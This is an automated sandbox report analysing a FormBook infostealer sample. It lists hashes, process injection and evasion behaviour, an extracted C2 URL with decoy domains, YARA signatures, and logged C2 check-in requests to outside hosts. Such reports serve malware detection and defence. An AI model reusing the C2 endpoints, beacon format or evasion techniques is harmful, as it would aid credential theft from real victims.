
Analysis Report g1EhgmCqCD.exe

Overview

General Information

Sample Name: g1EhgmCqCD.exe
Analysis ID: 404135
MD5: 5551346aa9f251895021b95a2a7cc390
SHA1: acbcecf7599d3c33f6f2a36c0947cfc633d0a406
SHA256: 9e189d8d48a66d2f53c972275642da7cbc8ad51b20f04cf1d592bef360db50cf
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • g1EhgmCqCD.exe (PID: 7100 cmdline: 'C:\Users\user\Desktop\g1EhgmCqCD.exe' MD5: 5551346AA9F251895021B95A2A7CC390)
    • g1EhgmCqCD.exe (PID: 1748 cmdline: C:\Users\user\Desktop\g1EhgmCqCD.exe MD5: 5551346AA9F251895021B95A2A7CC390)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 7036 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 7028 cmdline: /c del 'C:\Users\user\Desktop\g1EhgmCqCD.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cats16.com/8u3b/"], "decoy": ["pipienta.com", "wisdomfest.net", "jenniferreich.com", "bigcanoehomesforless.com", "kayandbernard.com", "offerbuildingsecrets.com", "benleefoto.com", "contactlesssoftware.tech", "statenislandplumbing.info", "lifestylemedicineservices.com", "blazerplanning.com", "fnatic-skins.club", "effectivemarketinginc.com", "babyshopit.com", "2000deal.com", "k12paymentcemter.com", "spwakd.com", "lesreponses.com", "abundando.com", "hawkspremierfhc.com", "midwestmadeclothing.com", "kamuakuinisiapa.com", "swirlingheadjewelry.com", "donelys.com", "stiloksero.com", "hoangphucsolar.com", "gb-contracting.com", "girlboyfriends.com", "decadejam.com", "glassfullcoffee.com", "todoparaconstruccion.com", "anygivenrunday.com", "newgalaxyindia.com", "dahlonegaforless.com", "blue-light.tech", "web-evo.com", "armmotive.com", "mollysmulligan.com", "penislandbrewer.com", "wgrimao.com", "dxm-int.net", "sarmaayagroup.com", "timbraunmusician.com", "amazoncovid19tracer.com", "peaknband.com", "pyqxlz.com", "palomachurch.com", "surfboardwarehouse.net", "burundiacademyst.com", "pltcoin.com", "workinglifestyle.com", "vickybowskill.com", "ottawahomevalues.info", "jtrainterrain.com", "francescoiocca.com", "metallitypiercing.com", "lashsavings.com", "discjockeydelraybeach.com", "indicraftsvilla.com", "tbq.xyz", "arfjkacsgatfzbazpdth.com", "appsend.online", "cunerier.com", "orospucocuguatmaca.com"]}

Yara Overview

Memory Dumps

Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security

Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  Strings:
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security

Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security

Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  Strings:
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C

Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security

Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: g1EhgmCqCD.exe | Virustotal: Detection: 19%
Source: g1EhgmCqCD.exe | ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match | File source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: g1EhgmCqCD.exe | Joe Sandbox ML: detected
Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: g1EhgmCqCD.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: g1EhgmCqCD.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: msiexec.pdb | source: g1EhgmCqCD.exe, 00000003.00000002.736006293.0000000003790000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000004.00000000.689209294.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: msiexec.pdbGCTL | source: g1EhgmCqCD.exe, 00000003.00000002.736006293.0000000003790000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: g1EhgmCqCD.exe, 00000003.00000002.728612173.0000000001960000.00000040.00000001.sdmp, msiexec.exe, 00000009.00000002.910212121.0000000000E60000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: g1EhgmCqCD.exe, msiexec.exe
Source: Binary string: wscui.pdb | source: explorer.exe, 00000004.00000000.689209294.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 4x nop then pop edi | 3_2_0040C368
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 4x nop then pop esi | 3_2_004157FE
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then pop edi | 9_2_001DC368
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then pop esi | 9_2_001E57FE

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.cats16.com/8u3b/
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=W0cOTmFEbnIJWZ9bmCGSrxqzq+x0vekMOKZqlI6Zx++4S/b9RAwggujLJglRzC1NYopM&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.kayandbernard.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU4DyS4zVRk0C&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.palomachurch.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=OOVfeLyiAWIpMBFTQ6m1xWirhq5hDDYdrnFBGiAZzRO7gqk2ccIpVztzXoI7ESdS0nQl&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.gb-contracting.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=JlfdOX0KzvBKJCwgzl05144UYnW9L68BcaCAZdJQAkSKjAz8k9yDpbSclDCZ+PzEALYQ&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.effectivemarketinginc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=E22nI3RnpwZWCefDbfimDOhq+q3UJ25lzo576Tq9svNo94y15LKXeVX0ss+5c65l5TJA&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.donelys.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=eX+lvTL7MbK9tAC2dirOGxJtmp01sBQmjLclFmQfDMoi81TUQ4NjHQaRBE4FvlEeLFd1&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.timbraunmusician.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=mgRUTtjP8oa9OY5PRVEI9pvNIm77vLp11T7wLcVaXT+EQBswbtHCc7JJdGZTw0GPMHIV&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.anygivenrunday.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /8u3b/?DzrXY=/wAP08hkjicc6Jt0eNBrV8xVMyK0vdY+Qr+E6nWTlRrbM9gWbC2ePToIBG3Sa1gtWFqW&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1 | Host: www.2000deal.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View | IP Address: 184.168.131.241
Source: Joe Sandbox View | ASN Name: CNSERVERSUS
Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: unknown | DNS traffic detected: queries for: www.kayandbernard.com
Source: g1EhgmCqCD.exe, 00000001.00000003.651135793.0000000005B80000.00000004.00000001.sdmp | String found in binary or memory: http://en.wikip
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: g1EhgmCqCD.exe, 00000001.00000002.667858038.00000000029F1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000004.00000002.911535792.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmp, g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com
Source: g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com$d
Source: g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comI
Source: g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comTC
Source: g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comfr
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comnic
Source: g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comu
Source: g1EhgmCqCD.exe | String found in binary or memory: http://www.churchsw.org/church-projector-project
Source: g1EhgmCqCD.exe | String found in binary or memory: http://www.churchsw.org/repository/Bibles/
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: g1EhgmCqCD.exe, 00000001.00000003.653172373.0000000005B7E000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html3
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: g1EhgmCqCD.exe, 00000001.00000002.667751786.00000000011E0000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.coma
Source: g1EhgmCqCD.exe, 00000001.00000002.667751786.00000000011E0000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.comiona
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: g1EhgmCqCD.exe, 00000001.00000003.649504763.0000000005B98000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/8
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn6
Source: g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnH
Source: g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnKr4
Source: g1EhgmCqCD.exe, 00000001.00000003.649286426.0000000005B7A000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnr
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr-
Source: g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.krn
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.krcom
Source: g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.krn-u
Source: explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: msiexec.exe, 00000009.00000002.912045913.00000000049E2000.00000004.00000001.sdmp | String found in binary or memory: https://mollysmulligan.com/8u3b/?DzrXY=Q16
Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: g1EhgmCqCD.exe, 00000001.00000002.667518282.0000000000CB0000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
